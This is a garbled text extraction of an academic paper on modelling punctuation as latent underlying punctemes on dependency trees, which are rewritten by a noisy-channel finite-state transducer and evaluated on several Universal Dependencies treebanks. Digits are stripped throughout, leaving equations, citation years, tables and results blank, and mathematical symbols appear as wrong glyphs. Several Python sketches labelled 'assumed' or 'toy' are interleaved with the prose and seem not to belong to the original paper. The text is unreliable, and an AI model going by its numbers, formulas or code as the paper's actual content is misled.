punctuation is helpful surface punctuation re- mains correlated with syntactic phrase structure. nlp systems for generating or editing text must be able to deploy surface punctuation as human writ- ers do. parsers and grammar induction systems benefit from the presence of surface punctuation marks (jones, ; spitkovsky et al., ). it is plausible that they could do better with a linguisti- cally informed model that explains exactly why the surface punctuation appears where it does. pat- terns of punctuation usage can also help identify the writer’s native language (markov et al., ). punctuation is neglected work on syntax and parsing tends to treat punctuation as an af- terthought rather than a phenomenon governed by its own linguistic principles. treebank annota- tion guidelines for punctuation tend to adopt sim- ple heuristics like “attach to the highest possi- ble node that preserves projectivity” (bies et al., ; nivre et al., ). many dependency parsing works exclude punctuation from evalua- tion (nivre et al., b; koo and collins, ; chen and manning, ; lei et al., ; kiper- wasser and goldberg, ), although some others retain punctuation (nivre et al., a; goldberg and elhadad, ; dozat and manning, ). http://universaldependencies.org/u/ dep/punct.html unpunctuated tree: t dale means river valley rootnsubj dobj attach tree: t underlying sequence: u sentence: ū surface sentence: x̄sequence: x noisychannel u u u u u x x x x x “ dale ” means “ river valley ” . “ dale ” means “ river valley . ” root. nsubj“ ” dobj“ ” figure : the generative story of a sentence. given an unpunctuated tree t at top, at each node w t , the attach process stochastically attaches a left puncteme l and a right puncteme r, which may be empty. the resulting tree t has underlying punctua- tion u. each slot’s punctuation ui u is rewritten to xi x by noisychannel. in tasks such as word embedding induction (mikolov et al., ; pennington et al., ) and machine translation (zens et al., ), punctua- tion marks are usually either removed or treated as ordinary words (řehůřek and sojka, ). yet to us, building a parse tree on a surface sentence seems as inappropriate as morphologi- cally segmenting a surface word. in both cases, one should instead analyze the latent underlying form, jointly with recovering that form. for exam- ple, the proper segmentation of english hoping is not hop-ing but hope-ing (with underlying e), and the proper segmentation of stopping is neither stopp-ing nor stop-ping but stop-ing (with only one underlying p). cot- terell et al. ( , ) get this right for morphol- ogy. we attempt to do the same for punctuation. formal model we propose a probabilistic generative model of sentences (figure ): p(x̄) = p t,t psyn(t) · p✓(t |t) · p�(x̄|ū(t )) ( ) first, an unpunctuated dependency tree t is stochastically generated by some recursive pro- cess psyn (e.g., eisner, , model c). second, each constituent (i.e., dependency subtree) sprouts optional underlying punctuation at its left and right edges, according to a probability distribution p✓ that depends on the constituent’s syntactic role (e.g., dobj for “direct object”). this punctuated tree t yields the underlying string ū = ū(t ), which is edited by a finite-state noisy channel p� to arrive at the surface sentence x̄. our model could be easily adapted to work on con- stituency trees instead. downloaded from http://www.mitpressjournals.org/doi/pdf/ . 
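the three factors of equation ( ) can be read as a sampling recipe: draw an unpunctuated tree, let every constituent sprout punctemes, then push the result through the noisy channel. the self-contained sketch below is an assumed toy rendering of that story; the node class, the attach table, the noisy_channel rule, and the left-to-right yield order are invented stand-ins, not the paper's components.

import random
from dataclasses import dataclass, field

# self-contained toy rendering of the generative story in equation ( ).
@dataclass
class Node:
    word: str
    deprel: str
    children: list = field(default_factory=list)
    l: str = ""    # left puncteme, sprouted by the attach step
    r: str = ""    # right puncteme

ATTACH = {          # toy p(l, r | dependency relation); real weights are learned
    "root":  [("", ".", 1.0)],
    "appos": [(",", ",", 0.8), ("", "", 0.2)],
    "nsubj": [("", "", 1.0)],
}

def sample_punctemes(node):
    r = random.random()
    for l, rt, p in ATTACH[node.deprel]:
        if r < p:
            node.l, node.r = l, rt
            return
        r -= p
    node.l, node.r = ATTACH[node.deprel][-1][:2]

def render(node):
    # yield of the punctuated subtree; for simplicity all children follow the head
    inside = " ".join([node.word] + [render(c) for c in node.children])
    return " ".join(tok for tok in (node.l, inside, node.r) if tok)

def noisy_channel(u):
    # toy surface rewriting: a period absorbs an adjacent comma
    return u.replace(", .", ".").replace(", ,", ",")

def sample_sentence(root):
    def attach(n):                     # step 2: every constituent sprouts punctemes
        sample_punctemes(n)
        for c in n.children:
            attach(c)
    attach(root)
    underlying = render(root)          # the underlying string read off the tree
    return noisy_channel(underlying)   # step 3: rewriting into surface punctuation

tree = Node("hail", "root", [Node("king", "nsubj", [Node("arthur", "appos")])])
print(sample_sentence(tree))           # e.g. "hail king , arthur ."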
/tacl_a_ by carnegie mellon university user on april http://universaldependencies.org/u/dep/punct.html http://universaldependencies.org/u/dep/punct.html this third step may alter the sequence of punc- tuation tokens at each slot between words—for ex- ample, in § , collapsing the double comma , , between pendragon and who. u and x denote just the punctuation at the slots of ū and x̄ respec- tively, with ui and xi denoting the punctuation to- ken sequences at the ith slot. thus, the transfor- mation at the ith slot is ui ! xi. since this model is generative, we could train it without any supervision to explain the observed surface string x̄: maximize the likelihood p(x̄) in ( ), marginalizing out the possible t, t values. in the present paper, however, we exploit known t values (as observed in the “depunctuated” ver- sion of a treebank). because t is observed, we can jointly train ✓, � to maximize just p(x | t) = x t p✓(t | t) · p�(x | u(t )) ( ) that is, the psyn model that generated t be- comes irrelevant, but we still try to predict what surface punctuation will be added to t . we still marginalize over the underlying punctuation marks u. these are never observed, but they must explain the surface punctuation marks x (§ . ), and they must be explained in turn by the syntax tree t (§ . ). the trained generative model then lets us restore or correct punctuation in new trees t (§ ). . generating underlying punctuation the attach model characterizes the probability of an underlying punctuated tree t given its cor- responding unpunctuated tree t , which is given by p✓(t | t) = y w t p✓(lw, rw | w) ( ) where lw, rw v are the left and right punctemes that t attaches to the tree node w. each puncteme (krahn, ) in the finite set v is a string of or more underlying punctuation tokens. the proba- bility p✓(l, r | w) is given by a log-linear model multi-token punctemes are occasionally useful. for ex- ample, the puncteme ... might consist of either or to- kens, depending on how the tokenizer works; similarly, the puncteme ?! might consist of or tokens. also, if a sin- gle constituent of t gets surrounded by both parentheses and quotation marks, this gives rise to punctemes (“ and ”). (a better treatment would add the parentheses as a separate puncteme pair at a unary node above the quotation marks, but that would have required t to introduce this extra node.) . point absorption . period absorption „ !, ,. !. -, !- .? !? .! !! -; !; ;. !. abbv. !abbv . quote transposition . bracket absorptions ”, !,” ”. !.” ,) !) -) !) (, !( ,” !” “, !“ table : some of nunberg’s punctuation interaction rules in english, in priority order. the absorption rules ensure that when there are two adjacent tokens, the “weaker” one is deleted (where the strength ordering is {?, !, (, ), “, ”} > . > {;, :} > - > ,), except that bracketing tokens such as () and “” do not absorb tokens outside the material they bracket. p✓(l, r|w) / ( exp ✓>f(l, r, w) if (l, r) wd(w) otherwise ( ) where v is the finite set of possible punctemes and wd ✓ v gives the possible puncteme pairs for a node w that has dependency relation d = d(w) to its parent. v and wd are estimated heuristically from the tokenized surface data (§ ). f(l, r, w) is a sparse binary feature vector, and ✓ is the cor- responding parameter vector of feature weights. 
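the log-linear distribution over puncteme pairs has its support restricted to wd(w) and is renormalized over that set only. a minimal assumed sketch of that computation is below; the three feature templates are invented placeholders for the richer templates of appendix a (symmetry, the head's pos tag, dependency paths, flanking tags, and so on), and theta and support are toy values.

import math

# minimal assumed sketch of the log-linear puncteme-pair distribution.
def features(l, r, deprel):
    return {
        "pair=%s|%s|%s" % (l, r, deprel): 1.0,
        "symmetric": 1.0 if (l, r) in {('"', '"'), ("(", ")"), (",", ",")} else 0.0,
        "both_empty": 1.0 if l == "" and r == "" else 0.0,
    }

def p_attach(l, r, deprel, theta, support):
    # p(l, r | w): zero outside the allowed set w_d(w), otherwise an
    # exponentiated feature score renormalized over w_d(w)
    if (l, r) not in support:
        return 0.0
    def score(pair):
        return math.exp(sum(theta.get(k, 0.0) * v
                            for k, v in features(pair[0], pair[1], deprel).items()))
    z = sum(score(pair) for pair in support)       # normalizer over w_d(w) only
    return score((l, r)) / z

theta = {"symmetric": 1.2, "both_empty": 0.5}      # toy feature weights
support = [("", ""), (",", ","), ('"', '"')]       # toy w_d(w) for some relation d
print(p_attach(",", ",", "appos", theta, support))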
the feature templates in appendix a consider the symmetry between l and r, and their compatibility with (a) the pos tag of w’s head word, (b) the de- pendency paths connecting w to its children and the root of t , (c) the pos tags of the words flank- ing the slots containing l and r, (d) surface punc- tuation already added to w’s subconstituents. . from underlying to surface from the tree t , we can read off the sequence of underlying punctuation tokens ui at each slot i between words. namely, ui concatenates the right punctemes of all constituents ending at i with the left punctemes of all constituents starting at i (as illustrated by the examples in § and figure ). the noisychannel model then transduces ui to a surface token sequence xi, for each i = , . . . , n independently (where n is the sentence length). nunberg’s formalism much like chomsky and halle’s ( ) phonological grammar of english, nunberg’s ( ) descriptive english punctuation grammar (table ) can be viewed computationally as a priority string rewriting system, or markov algorithm (markov, ; caracciolo di forino, ). the system begins with a token string u. the appendices (supplementary material) are available at https://arxiv.org/abs/ . . downloaded from http://www.mitpressjournals.org/doi/pdf/ . /tacl_a_ by carnegie mellon university user on april https://arxiv.org/abs/ . https://arxiv.org/abs/ . abcde . ab ! ab abcde . bc ! b a bde . bd ! db a dbe . be ! e a d e figure : editing abcde ! ade with a sliding win- dow. (when an absorption rule maps tokens to , our diagram leaves blank space that is not part of the out- put string.) at each step, the left-to-right process has already committed to the green tokens as output; has not yet looked at the blue input tokens; and is currently considering how to (further) rewrite the black tokens. the right column shows the chosen edit. at each step it selects the highest-priority local rewrite rule that can apply, and applies it as far left as possible. when no more rules can apply, the final state of the string is returned as x. simplifying the formalism markov algorithms are turing complete. fortunately, johnson ( ) noted that in practice, phonological u ! x maps described in this formalism can usually be imple- mented with finite-state transducers (fsts). for computational simplicity, we will formu- late our punctuation model as a probabilistic fst (pfst)—a locally normalized left-to-right rewrite model (cotterell et al., ). the probabilities for each language must be learned, using gradient descent. normally we expect most probabilities to be near or , making the pfst nearly determin- istic (i.e., close to a subsequential fst). however, permitting low-probability choices remains useful to account for typographical errors, dialectal dif- ferences, and free variation in the training corpus. our pfst generates a surface string, but the invertibility of fsts will allow us to work back- wards when analyzing a surface string (§ ). a sliding-window model instead of having rule priorities, we apply nunberg-style rules within a -token window that slides over u in a single left- to-right pass (figure ). conditioned on the cur- rent window contents ab, a single edit is selected stochastically: either ab !ab (no change), ab !b (left absorption), ab ! a (right absorption), or ab ! ba (transposition). then the window slides rightward to cover the next input token, together with the token that is (now) to its left. a and b are always real tokens, never boundary symbols. 
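the sliding-window pass illustrated in the figure above can be simulated directly. in the assumed sketch below, the four edit types (keep, left absorption ab to b, right absorption ab to a, transposition ab to ba) and the 2-token window follow the text, but the probability table edit_probs is invented; a trained model would learn these values, and for english the paper slides the window right-to-left instead.

import random

# toy, assumed simulation of the 2-token sliding-window noisy channel
# (not the paper's pfst).
EDIT_PROBS = {
    (",", ","): {"keep": 0.05, "left": 0.05, "right": 0.90, "transpose": 0.00},
    (",", "."): {"keep": 0.05, "left": 0.90, "right": 0.05, "transpose": 0.00},
    ('"', "."): {"keep": 0.10, "left": 0.00, "right": 0.00, "transpose": 0.90},
}
DEFAULT = {"keep": 1.0, "left": 0.0, "right": 0.0, "transpose": 0.0}

def choose(dist):
    r = random.random()
    for edit, p in dist.items():
        if r < p:
            return edit
        r -= p
    return "keep"

def slide(tokens):
    # single left-to-right pass; the window holds the last committed output
    # token and the next input token. english quote transposition would need
    # the right-to-left direction instead.
    out = []
    for tok in tokens:
        if not out:
            out.append(tok)
            continue
        a, b = out[-1], tok
        edit = choose(EDIT_PROBS.get((a, b), DEFAULT))
        if edit == "left":          # ab -> b
            out[-1] = b
        elif edit == "right":       # ab -> a
            pass
        elif edit == "transpose":   # ab -> ba
            out[-1] = b
            out.append(a)
        else:                       # ab -> ab
            out.append(b)
    return out

print(slide([",", ",", "."]))   # usually ['.']: one comma is absorbed, then the period absorbs the other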
� specifies the conditional edit probabilities. rather than learn a separate edit probability distribution for each bigram ab, one could share parameters across bi- grams. for example, table ’s caption says that “stronger” tokens tend to absorb “weaker” ones. a model that incor- these specific edit rules (like nunberg’s) can- not insert new symbols, nor can they delete all of the underlying symbols. thus, surface xi is a good clue to ui: all of its tokens must appear underly- ingly, and if xi = ✏ (the empty string) then ui = ✏. the model can be directly implemented as a pfst (appendix d ) using cotterell et al.’s ( ) more general pfst construction. our single-pass formalism is less expressive than nunberg’s. it greedily makes decisions based on at most one token of right context (“label bias”). it cannot rewrite ’”. !.’” or ”,. !.” because the . is encountered too late to percolate leftward; luckily, though, we can handle such en- glish examples by sliding the window right-to-left instead of left-to-right. we treat the sliding direc- tion as a language-specific parameter. . training objective building on equation ( ), we train ✓, � to lo- cally maximize the regularized conditional log- likelihood ⇣ x x,t log p(x | t)� ⇠ · e t [c(t )] ⌘ � & · ||✓|| ( ) where the sum is over a training treebank. the expectation e[· · · ] is over t ⇠ p(· | t, x). this generalized expectation term pro- vides posterior regularization (mann and mccal- lum, ; ganchev et al., ), by encourag- ing parameters that reconstruct trees t that use symmetric punctuation marks in a “typical” way. the function c(t ) counts the nodes in t whose punctemes contain “unmatched” symmetric punc- tuation tokens: for example, ) is “matched” only when it appears in a right puncteme with ( at the comparable position in the same constituent’s left puncteme. the precise definition is given in ap- pendix b. porated this insight would not have to learn o(|⌃| ) separate absorption probabilities (two per bigram ab), but only o(|⌃|) strengths (one per unigram a, which may be regarded as a -dimensional embedding of the punctuation token a). we figured that the punctuation vocabulary ⌃ was small enough (table ) that we could manage without the additional com- plexity of embeddings or other featurization, although this does presumably hurt our generalization to rare bigrams. we could have handled all languages uniformly by mak- ing � passes of the sliding window (via a composition of � pfsts), with at least one pass in each direction. in retrospect, there was no good reason to square the et [c(t )] term. however, when we started redoing the ex- periments, we found the results essentially unchanged. downloaded from http://www.mitpressjournals.org/doi/pdf/ . /tacl_a_ by carnegie mellon university user on april https://arxiv.org/abs/ . https://arxiv.org/abs/ . https://arxiv.org/abs/ . in our development experiments on english, the posterior regularization term was necessary to dis- cover an aesthetically appealing theory of under- lying punctuation. when we dropped this term (⇠ = ) and simply maximized the ordinary regu- larized likelihood, we found that the optimization problem was underconstrained: different training runs would arrive at different, rather arbitrary un- derlying punctemes. for example, one training run learned an attach model that used underlying “. to terminate sentences, along with a noisy- channel model that absorbed the left quotation mark into the period. 
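the posterior-regularization penalty depends on counting nodes whose punctemes use symmetric marks in an unmatched way (the function defined precisely in the paper's appendix b). the check below is an assumed simplification of that idea, treating punctemes as plain character strings and testing only whether a bracketing mark has its partner at the mirrored position of the opposite puncteme; partners and c are illustrative names.

# assumed simplification of the "unmatched symmetric punctuation" count used by
# the posterior regularizer; the paper's exact definition is in its appendix b.
PARTNERS = {"(": ")", "[": "]", "“": "”", '"': '"', "¿": "?", "¡": "!"}

def unmatched(left, right):
    # true if the (left, right) puncteme pair of a constituent uses a symmetric
    # mark without its partner at the mirrored position of the other puncteme
    for i, tok in enumerate(left):
        if tok in PARTNERS:
            j = len(right) - 1 - i
            if j < 0 or j >= len(right) or right[j] != PARTNERS[tok]:
                return True
    for i, tok in enumerate(right):
        if tok in PARTNERS.values():
            j = len(left) - 1 - i
            if j < 0 or j >= len(left):
                return True
    return False

def c(puncteme_pairs):
    # count nodes of a candidate tree whose puncteme pair is unmatched;
    # puncteme_pairs holds one (left, right) string pair per node
    return sum(unmatched(l, r) for l, r in puncteme_pairs)

print(c([("(", ")"), ('"', "."), ("", "")]))   # -> 1: only the middle pair is unmatched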
by encouraging the under- lying punctuation to be symmetric, we broke the ties. we also tried making this a hard constraint (⇠ = ), but then the model was unable to explain some of the training sentences at all, giving them probability of . for example, i went to the “ special place ” cannot be explained, be- cause special place is not a constituent. inference in principle, working with the model ( ) is straightforward, thanks to the closure properties of formal languages. provided that psyn can be en- coded as a weighted cfg, it can be composed with the weighted tree transducer p✓ and the weighted fst p� to yield a new weighted cfg (similarly to bar-hillel et al., ; nederhof and satta, ). under this new grammar, one can recover the opti- mal t, t for x̄ by dynamic programming, or sum over t, t by the inside algorithm to get the likeli- hood p(x̄). a similar approach was used by levy ( ) with a different fst noisy channel. in this paper we assume that t is observed, al- lowing us to work with equation ( ). this cuts the computation time from o(n ) to o(n). whereas the inside algorithm for ( ) must consider o(n ) possible constituents of x̄ and o(n) ways of build- ing each, our algorithm for ( ) only needs to iterate over the o(n) true constituents of t and the true way of building each. however, it must still con- sider the |wd| puncteme pairs for each constituent. recall that the noisychannel model family (§ . ) requires the surface “ before special to appear under- lyingly, and also requires the surface ✏ after special to be empty underlyingly. these hard constraints clash with the ⇠ = hard constraint that the punctuation around special must be balanced. the surface ” after place causes a similar problem: no edge can generate the match- ing underlying “. we do o(n) multiplications of n ⇥ n matrices where algorithm the algorithm for scoring a given (t, x) pair. the code in blue is used during train- ing to get the posterior regularization term in ( ). input: t , x . training pair (omits t , u) output: p(x | t), e[c(t )] : procedure totalscore(t , x) : for i = to n do : compute wfsa (mi, �i, ⇢i) : e . exp. count of unmatched punctemes : procedure in(w) . w t : i, k slots at left, right of w constit : j slot at right of w headword : mleft ( q w leftkids(w) in(w ))⇢j� : mright �>j ( q w rightkids(w) in(w )) : m mleft · · mright . rnj⇥ , r ⇥nj : m . rni⇥nk : for (l, r) wd(w) do : p p✓(l, r | w) : m m + p · mi(l)m mk(r) : e e + p · l,r have unmatched punc : return m . rni⇥nk : mroot in(root(t)) : return �> mroot⇢n, e . r, r . algorithms given an input sentence x̄ of length n, our job is to sum over possible trees t that are consistent with t and x̄, or to find the best such t . this is roughly a lattice parsing problem—made easier by knowing t . however, the possible ū values are characterized not by a lattice but by a cyclic wfsa (as |ui| is unbounded whenever |xi| > ). for each slot  i  n, transduce the sur- face punctuation string xi by the inverted pfst for p� to obtain a weighted finite-state automa- ton (wfsa) that describes all possible underly- ing strings ui. this wfsa accepts each pos- sible ui with weight p�(xi | ui). if it has ni states, we can represent it (berstel and reutenauer, ) with a family of sparse weight matrices mi(�) rni⇥ni , whose element at row s and column t is the weight of the s ! t arc labeled with �, or if there is no such arc. additional vectors �i, ⇢i rni specify the initial and final weights. 
(�i is one-hot if the pfst has a single n = o(# of punc types · max # of punc tokens per slot). constructively, compose the u-to-x pfst (from the end of § . ) with a straight-line fsa accepting only xi, and project the resulting wfst to its input tape (pereira and ri- ley, ), as explained at the end of appendix d. downloaded from http://www.mitpressjournals.org/doi/pdf/ . /tacl_a_ by carnegie mellon university user on april https://arxiv.org/abs/ . initial state, of weight .) for any puncteme l (or r) in v, we define mi(l) = mi(l )mi(l ) · · · mi(l|l|), a product over the or more tokens in l. this gives the total weight of all s !⇤ t wfsa paths labeled with l. the subprocedure in algorithm essentially extends this to obtain a new matrix in(w) rni⇥nk , where the subtree rooted at w stretches from slot i to slot k. its element in(w)st gives the total weight of all extended paths in the ū wfsa from state s at slot i to state t at slot k. an extended path is defined by a choice of underly- ing punctemes at w and all its descendants. these punctemes determine an s-to-final path at i, then initial-to-final paths at i+ through k� , then an initial-to-t path at k. the weight of the extended path is the product of all the wfsa weights on these paths (which correspond to transition prob- abilities in p� pfst) times the probability of the choice of punctemes (from p✓). this inside algorithm computes quantities needed for training (§ . ). useful variants arise via well-known methods for weighted derivation forests (berstel and reutenauer, ; goodman, ; li and eisner, ; eisner, ). specifically, to modify algorithm to maximize over t values (§§ . – . ) instead of summing over them, we switch to the derivation semiring (goodman, ), as follows. whereas in(w)st used to store the total weight of all extended paths from state s at slot i to state t at slot j, now it will store the weight of the best such extended path. it will also store that extended path’s choice of un- derlying punctemes, in the form of a puncteme- annotated version of the subtree of t that is rooted at w. this is a potential subtree of t . thus, each element of in(w) has the form (r, d) where r r and d is a tree. we define addition and multiplication over such pairs: (r, d) + (r , d ) = ( (r, d) if r > r (r , d ) otherwise ( ) (r, d) · (r , d ) = (rr , dd ) ( ) where dd denotes an ordered combination of two trees. matrix products uv and scalar-matrix products p · v are defined in terms of element ad- dition and multiplication as usual: (uv)st = p rusr · vrt ( ) (p · v)st = p · vst ( ) what is dd ? for presentational purposes, it is convenient to represent a punctuated dependency tree as a bracketed string. for example, the under- lying tree t in figure would be [ [“ dale ”] means [“ [ river ] valley ”] ] where the words correspond to nodes of t . in this case, we can represent every d as a partial bracketed string and define dd by string concatenation. this presentation ensures that multiplication ( ) is a complete and associative (though not commutative) operation, as in any semiring. as base cases, each real-valued element of mi(l) or mk(r) is now paired with the string [l or r] respectively, and the real number at line is paired with the string w. the real-valued elements of the �i and ⇢i vectors and the matrix at line are paired with the empty string ✏, as is the real number p at line . in practice, the d strings that appear within the matrix m of algorithm will always represent complete punctuated trees. 
thus, they can actu- ally be represented in memory as such, and differ- ent trees may share subtrees for efficiency (using pointers). the product in line constructs a ma- trix of trees with root w and differing sequences of left/right children, while the product in line annotates those trees with punctemes l, r. to sample a possible t from the derivation for- est in proportion to its probability (§ . ), we use the same algorithm but replace equation ( ) with (r, d) + (r , d ) = ( (r + r , d) if u < rr+r (r + r , d ) otherwise with u ⇠ uniform( , ) being a random number. . optimization having computed the objective ( ), we find the gradient via automatic differentiation, and opti- mize ✓, � via adam (kingma and ba, )—a variant of stochastic gradient decent—with learn- ing rate . , batchsize , sentence per epoch , and l regularization. (these hyperparam- eters, along with the regularization coefficients & and ⇠ from equation ( ), were tuned on dev data (§ ) for each language respectively.) we train we still construct the real matrix mi(l) by ordinary ma- trix multiplication before pairing its elements with strings. this involves summation of real numbers: each element of the resulting real matrix is a marginal probability, which sums over possible pfst paths (edit sequences) that could map the underlying puncteme l to a certain substring of the surface slot xi. similarly for mk(r). downloaded from http://www.mitpressjournals.org/doi/pdf/ . /tacl_a_ by carnegie mellon university user on april the punctuation model for epochs. the initial noisychannel parameters (�) are drawn from n( , ), and the initial attach parameters (✓) are drawn from n( , ) (with one minor excep- tion described in appendix a). intrinsic evaluation of the model data. throughout §§ – , we will examine the punctuation model on a subset of the univer- sal dependencies (ud) version . (nivre et al., )—a collection of dependency treebanks across languages with unified pos-tag and de- pendency label sets. each treebank has designated training, development, and test portions. we ex- periment on arabic, english, chinese, hindi, and spanish (table )—languages with diverse punc- tuation vocabularies and punctuation interaction rules, not to mention script directionality. for each treebank, we use the tokenization provided by ud, and take the punctuation tokens (which may be multi-character, such as ...) to be the tokens with the punct tag. we replace each straight dou- ble quotation mark " with either “ or ” as appro- priate, and similarly for single quotation marks. we split each non-punctuation token that ends in . (such as etc.) into a shorter non-punctuation token (etc) followed by a special punctuation to- ken called the “abbreviation dot” (which is distinct from a period). we prepend a special punctuation mark ˆ to every sentence x̄, which can serve to absorb an initial comma, for example. we then replace each token with the special symbol unk if its type appeared fewer than times in the training portion. this gives the surface sentences. to estimate the vocabulary v of underlying punctemes, we simply collect all surface token se- quences xi that appear at any slot in the training portion of the processed treebank. this is a gener- ous estimate. similarly, we estimate wd (§ . ) as all pairs (l, r) v that flank any d constituent. recall that our model generates surface punctu- ation given an unpunctuated dependency tree. we train it on each of the languages independently. 
we evaluate on conditional perplexity, which will be low if the trained model successfully assigns a high probability to the actual surface punctuation in a held-out corpus of the same language. for en and en_esl, “ and ” are distinguished by language-specific part-of-speech tags. for the other lan- guages, we identify two " dependents of the same head word, language treebank #token %punct #omit #type arabic ar k . chinese zh k . english en k . en_esl . k . hindi hi k . spanish es_ancora k . table : statistics of our datasets. “treebank” is the ud treebank identifier, “#token” is the number of to- kens, “%punct” is the percentage of punctuation to- kens, “#omit” is the small number of sentences con- taining non-leaf punctuation tokens (see footnote ), and “#type” is the number of punctuation types after preprocessing. (recall from § that preprocessing dis- tinguishes between left and right quotation mark types, and between abbreviation dot and period dot types.) baselines. we compare our model against three baselines to show that its complexity is necessary. our first baseline is an ablation study that does not use latent underlying punctuation, but generates the surface punctuation directly from the tree. (to implement this, we fix the parameters of the noisy channel so that the surface punctuation equals the underlying with probability .) if our full model performs significantly better, it will demonstrate the importance of a distinct underlying layer. our other two baselines ignore the tree struc- ture, so if our full model performs significantly better, it will demonstrate that conditioning on ex- plicit syntactic structure is useful. these baselines are based on previously published approaches that reduce the problem to tagging: xu et al. ( ) use a bilstm-crf tagger with bigram topology; tilk and alumäe ( ) use a bigru tagger with attention. in both approaches, the model is trained to tag each slot i with the correct string xi v⇤ (possibly ✏ or ˆ). these are discriminative proba- bilistic models (in contrast to our generative one). each gives a probability distribution over the tag- gings (conditioned on the unpunctuated sentence), so we can evaluate their perplexity. results. as shown in table , our full model beats the baselines in perplexity in all languages. also, in of languages, allowing a trained noisychannel (rather than the identity map) replacing the left one with “ and the right one with ”. for symmetry, we should also have added a final mark. these methods learn word embeddings that optimize conditional log-likelihood on the punctuation restoration training data. they might do better if these embeddings were shared with other tasks, as multi-task learning might lead them to discover syntactic categories of words. downloaded from http://www.mitpressjournals.org/doi/pdf/ . /tacl_a_ by carnegie mellon university user on april https://arxiv.org/abs/ . attn. crf attach +nc dir arabic . . . . l chinese . . . . l english . . . . r hindi . . . . l spanish . . . . r table : results of the conditional perplexity experi- ment (§ ), reported as perplexity per punctuation slot, where an unpunctuated sentence of n words has n + slots. column “attn.” is the bigru tagger with atten- tion, and “crf” stands for the bilstm-crf tagger. “attach” is the ablated version of our model where surface punctuation is directly attached to the nodes. our full model “+nc” adds noisychannel to trans- duce the attached punctuation into surface punctuation. dir is the learned direction (§ . 
) of our full model’s noisy channel pfst: left-to-right or right-to-left. our models are given oracle parse trees t . the best per- plexity is boldfaced, along with all results that are not significantly worse (paired permutation test, p < . ). significantly improves the perplexity. analysis of the learned grammar . rules learned from the noisy channel we study our learned probability distribution over noisy channel rules (ab ! b, ab ! a, ab ! ab, ab !ba) for english. the probability distributions corresponding to six of nunberg’s english rules are shown in figure . by comparing the orange and blue bars, observe that the model trained on the en_cesl treebank learned different quotation rules from the one trained on the en treebank. this is because en_cesl follows british style, whereas en has american-style quote transposition. we now focus on the model learned from the en treebank. nunberg’s rules are deterministic, and our noisy channel indeed learned low-entropy rules, in the sense that for an input ab with un- derlying count � , at least one of the possi- ble outputs (a, b, ab or ba) always has probability > . . the one exception is ”. !.” for which the argmax output has probability ⇡ . , because writers do not apply this quote transposition rule consistently. as shown by the blue bars in fig- ure , the high-probability transduction rules are american style places commas and periods inside the quotation marks, even if they are not logically in the quote. british style (more sensibly) places unquoted periods and commas in their logical place, sometimes outside the quo- tation marks if they are not part of the quote. for rarer underlying pairs ab, the estimated distributions sometimes have higher entropy due to undertraining. figure : rewrite probabilities learned for english, averaged over the last epochs on en treebank (blue bars) or en_esl treebank (orange bars). the header above each figure is the underlying punctuation string (input to noisychannel). the two counts in the fig- ure headers are the number of occurrences of the under- lying punctuation strings in the -best reconstruction of underlying punctuation sequences (by algorithm ) re- spectively in the en and en_esl treebank. each bar represents one surface punctuation string (output of noisychannel), its height giving the probability. consistent with nunberg’s hand-crafted determin- istic grammar in table . our system has high precision when we look at the confident rules. of the learned edits with conditional probability > . , nunberg lists . our system also has good recall. nunberg’s hand-crafted schemata consider punctuation types and generate a total of edit rules, in- cluding the specimens in table . that is, of the = possible underlying punctuation bi- grams ab, are supposed to undergo absorption or transposition. our method achieves fairly high recall, in the sense that when nunberg proposes ab !�, our learned p(� | ab) usually ranks highly among all probabilities of the form p(� | ab). of nunberg’s rules got rank , got rank , and the remaining got rank > . the mean recipro- cal rank was . . recall is quite high when we restrict to those nunberg rules ab ! � for which our model is confident how to rewrite ab, in the sense that some p(� | ab) > . . (this tends to eliminate rare ab: see footnote .) of these nunberg rules, rules got rank , got rank , and only got rank worse than . the mean recip- rocal rank was . . ¿what about spanish? 
spanish uses inverted question marks ¿ and exclamation marks ¡, which form symmetric pairs with the regular question marks and exclamation marks. if we try to ex- trapolate to spanish from nunberg’s english for- downloaded from http://www.mitpressjournals.org/doi/pdf/ . /tacl_a_ by carnegie mellon university user on april malization, the english mark most analogous to ¿ is (. our learned noisy channel for spanish (not graphed here) includes the high-probability rules ,¿ !,¿ and :¿ !:¿ and ¿, !¿ which match nunberg’s treatment of ( in english. . attachment model what does our model learn about how dependency relations are marked by underlying punctuation? ˆ,earlier, kerry said ,“...,in fact, answer the question”. ˆearlier, kerry said ,“...,in fact, answer the question.” root.,advmod, ,“ccomp” ,nmod, the above example illustrates the use of specific puncteme pairs to set off the advmod, ccomp, and nmod relations. notice that said takes a complement (ccomp) that is symmetrically quoted but also left delimited by a comma, which is indeed how direct speech is punctuated in english. this example also illustrates quotation transposition. the top five relations that are most likely to generate symmetric punctemes and their top (l, r) pairs are shown in table . section , , ,... , and ... section , ,... , and ... ,conj, ,conj, conj cc the above example shows how our model han- dles commas in conjunctions of or more phrases. ud format dictates that each conjunct after the first is attached by the conj relation. as shown above, each such conjunct is surrounded by under- lying commas (via the n.,.,.conj feature from appendix a), except for the one that bears the conjunction and (via an even stronger weight on the c.✏.✏.���!conj.cc feature). our learned feature weights indeed yield p(` = ✏, r = ✏) > . for the final conjunct in this example. some writers omit the “oxford comma” before the conjunction: this style can be achieved simply by changing “sur- rounded” to “preceded” (that is, changing the n feature to n.,.✏.conj). performance on extrinsic tasks we evaluate the trained punctuation model by us- ing it in the following three tasks. [en] earlier, kerry said, “just because you get an honorable discharge does not, in fact, answer that question.” [en] sections , , , , , and will survive any termination of this license. parataxis appos list advcl ccomp . . . . . , , . , , . ✏ ✏ . ✏ ✏ . ✏ ✏ . ✏ ✏ . : ✏ . , , . , , . “ ” . ( ) . - ✏ . , ✏ . ✏ , . , , . - ✏ . ✏ ✏ . < > . ( ) . :“ ” . : ✏ . ( ) . ( ) . ✏ - . “ ,” . table : the top relations that are most likely to generate symmetric punctemes, the entropy of their puncteme pair (row ), and their top puncteme pairs (rows – ) with their probabilities shown as percent- ages. the symmetric punctemes are in boldface. . punctuation restoration in this task, we are given a depunctuated sentence d̄ and must restore its (surface) punctuation. our model supposes that the observed punctuated sen- tence x̄ would have arisen via the generative pro- cess ( ). thus, we try to find t , t , and x̄ that are consistent with d̄ (a partial observation of x̄). the first step is to reconstruct t from d̄. this initial parsing step is intended to choose the t that maximizes psyn(t | d̄). this step depends only on psyn and not on our punctuation model (p✓, p�). in practice, we choose t via a dependency parser that has been trained on an unpunctuated treebank with examples of the form (d̄, t). equation ( ) now defines a distribution over (t , x) given this t . 
